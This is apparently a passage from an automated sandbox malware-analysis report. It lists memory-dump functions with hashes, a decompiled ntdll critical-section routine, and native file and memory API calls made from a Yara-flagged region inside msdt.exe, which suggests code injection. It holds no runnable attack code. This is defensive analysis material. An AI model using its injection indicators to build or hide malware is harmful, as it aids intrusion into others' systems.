                                                                                        • Opcode Fuzzy Hash: b92d8b50086bc345f7877eff2e93f094f563e00cecaa5b8488f0b7591810ef2c
                                                                                        • Instruction Fuzzy Hash: 95C08C23E1904500D72A2CBDB8842F4EBA88B830ACF1833ABD848B3916A497E40D048C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF98A0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                                        • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                                                                                        • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                                        • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9820, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                                        • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
                                                                                        • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                                        • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AFB040, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                                        • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                                                                                        • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                                        • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF95F0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                        • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                                                                        • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                        • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF99D0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                        • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                                                                        • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                        • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9520, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                        • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                                                                        • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                        • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AFAD30, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                        • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                                                                        • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                        • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9560, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                        • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
                                                                                        • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                        • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9950, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                        • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                                                                        • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                        • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9A80, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                        • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                                                                        • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                        • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF96D0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                        • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                                                                        • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                        • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9A10, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                        • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                                                                        • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                        • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9610, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                        • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                                                                        • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                        • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9650, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                        • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                                                                        • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                        • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AFA3B0, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                        • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                                                                        • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                        • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9B00, Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                                        • Instruction ID: b962c6b9c91677f59eabb441c46901add7741bb2ad88d548c5bcf5e74d541984
                                                                                        • Opcode Fuzzy Hash: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                                        • Instruction Fuzzy Hash: 3A90026224100802E250719984147070446D7D0741F51C065A002455CD86968975B6F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AF9670, Relevance: .0, Instructions: 2COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: fb8dc60d3c8ed19cd1cc89408650463b5fda6c01436fcdf4bfc276a0f888acbd
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00B4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 53%
                                                                                        			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                        0x00b4fdda
                                                                                        0x00b4fde2
                                                                                        0x00b4fde5
                                                                                        0x00b4fdec
                                                                                        0x00b4fdfa
                                                                                        0x00b4fdff
                                                                                        0x00b4fe0a
                                                                                        0x00b4fe0f
                                                                                        0x00b4fe17
                                                                                        0x00b4fe1e
                                                                                        0x00b4fe19
                                                                                        0x00b4fe19
                                                                                        0x00b4fe19
                                                                                        0x00b4fe20
                                                                                        0x00b4fe21
                                                                                        0x00b4fe22
                                                                                        0x00b4fe25
                                                                                        0x00b4fe40

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                                                                        Strings
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                                        • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                                                                        • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                                        • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Analysis Process: msdt.exe PID: 984 Parent PID: 3440 msdt.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 02C79D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02C74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C74B87,007A002E,00000000,00000060,00000000,00000000), ref: 02C79DAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: eaf551944967b820e445d2cffdd29fa03fa0281cf78580814fb1bf4ddfb5328d
                                                                                        • Instruction ID: 19f4423fe353dbb547eea9ce66e56fbaa993fb6ad1ac96f2ee49fbeac73aaf87
                                                                                        • Opcode Fuzzy Hash: eaf551944967b820e445d2cffdd29fa03fa0281cf78580814fb1bf4ddfb5328d
                                                                                        • Instruction Fuzzy Hash: A701B2B2244108AFDB48CF88DC84EEB77AAEF8C754F158248FA0DD7250D630E851CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02C74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C74B87,007A002E,00000000,00000060,00000000,00000000), ref: 02C79DAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction ID: ad8ca6f92cd390dccfcc76ca02ee218aacb083c4b2b4f797668b0427ddfe5009
                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction Fuzzy Hash: 41F0B2B2200208ABCB48CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79E8A, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(02C74D20,?,?,02C74D20,00000000,FFFFFFFF), ref: 02C79EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: be5896ac27e7593fe57087c3ee3094daf23a2ac5a3795fd5807a7fac6d71b634
                                                                                        • Instruction ID: 0d002a5c80f09db2cb7acafeb7ec7eba26ece09677830db72ca95d1a458950eb
                                                                                        • Opcode Fuzzy Hash: be5896ac27e7593fe57087c3ee3094daf23a2ac5a3795fd5807a7fac6d71b634
                                                                                        • Instruction Fuzzy Hash: 99018CB6200208AFCB10EFA9DC81DAB77A9EF88314F158559FD4C97241C230E921CBE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79DB4, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(02C74D42,5EB6522D,FFFFFFFF,02C74A01,?,?,02C74D42,?,02C74A01,FFFFFFFF,5EB6522D,02C74D42,?,00000000), ref: 02C79E55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 7685ccd46f475d121693918f9246602c0b5886f39cef1474eb0cf82892e15680
                                                                                        • Instruction ID: 296c3e89b47cf2dbdb30c5542aaa4f5db4dbeb3741312306a79cb95a0a78a5a3
                                                                                        • Opcode Fuzzy Hash: 7685ccd46f475d121693918f9246602c0b5886f39cef1474eb0cf82892e15680
                                                                                        • Instruction Fuzzy Hash: FFF0A4B2204108AFCB14DF99DC81EEB77A9EF8C754F168648BA1DA7251D630E811CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(02C74D42,5EB6522D,FFFFFFFF,02C74A01,?,?,02C74D42,?,02C74A01,FFFFFFFF,5EB6522D,02C74D42,?,00000000), ref: 02C79E55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction ID: 58ac506c777646ddedf5b6bf729c46e6d5df27eaa955881de52f0ce56d2fd1fc
                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction Fuzzy Hash: E9F0B7B2200208AFCB14DF89DC80EEB77ADEF8C754F158248BE1DA7251D630E811CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79F3C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C62D11,00002000,00003000,00000004), ref: 02C79F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: b315b18f5cc1f58d63e86cdd3c1827ffe4217e348b5cc7edbd0aea41f7fd5218
                                                                                        • Instruction ID: eee6fd5b85a1b6b7293a0339c74a5d9b49d97215703fc776bb830feeece2155e
                                                                                        • Opcode Fuzzy Hash: b315b18f5cc1f58d63e86cdd3c1827ffe4217e348b5cc7edbd0aea41f7fd5218
                                                                                        • Instruction Fuzzy Hash: B4F01CB1200208AFDB18DF98CC81EEB77ADFF88350F118159FE09A7251C630E911CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C62D11,00002000,00003000,00000004), ref: 02C79F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                        • Instruction ID: 55aecc41b61356b77b23a6b99e0da0a15032ba7595acc7c0bf02ffd64a2486fc
                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                        • Instruction Fuzzy Hash: 20F015B2200208ABCB14DF89CC80EAB77ADEF88750F118148BE08A7241C630F810CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C79E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(02C74D20,?,?,02C74D20,00000000,FFFFFFFF), ref: 02C79EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction ID: 353a0943de1445be561c62b37ad8abfee361f08168bf9571471023c4de48e918
                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction Fuzzy Hash: ADD012752002146BD710EB98CC85E97775DEF44750F154455BA585B241C530F51086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1da2e7384cceb536a89571954c64b3ef6cfeb00b77f647c4e2a8ab842b365faf
                                                                                        • Instruction ID: 8bcf37f47e5d295c3c2290cc9e626f7c1362bf51874d4323ac1d6ee7dd5f50d3
                                                                                        • Opcode Fuzzy Hash: 1da2e7384cceb536a89571954c64b3ef6cfeb00b77f647c4e2a8ab842b365faf
                                                                                        • Instruction Fuzzy Hash: 939002B120200513F111655B4505727004D97D06C5F91C412A4415558DA696D952B161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 046D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
